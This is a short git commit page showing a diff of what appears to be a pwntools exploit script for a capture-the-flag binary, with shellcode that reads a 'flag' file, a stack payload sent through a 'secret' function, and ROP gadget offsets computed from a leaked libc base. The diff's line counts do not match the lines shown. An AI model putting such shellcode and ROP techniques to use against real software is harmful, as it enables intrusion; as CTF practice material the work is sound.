Update OtherBin/playthenew and README

This commit is contained in:
Jack Ren
2022-04-04 14:38:35 +08:00
parent 60da235775
commit 272640d3c6
2 changed files with 2 additions and 2 deletions

View File

@@ -120,8 +120,6 @@ shellcode = shellcraft.amd64.linux.cat2('flag')
secret(p64(0) + p64(gets) + p64(leak_stack - 0x110) + asm(shellcode))
backdoor()
raw_input()
pop_rdi_ret = 0x000000000002164f + libc_base
pop_rsi_ret = 0x0000000000023a6a + libc_base
pop_rdx_ret = 0x0000000000001b96 + libc_base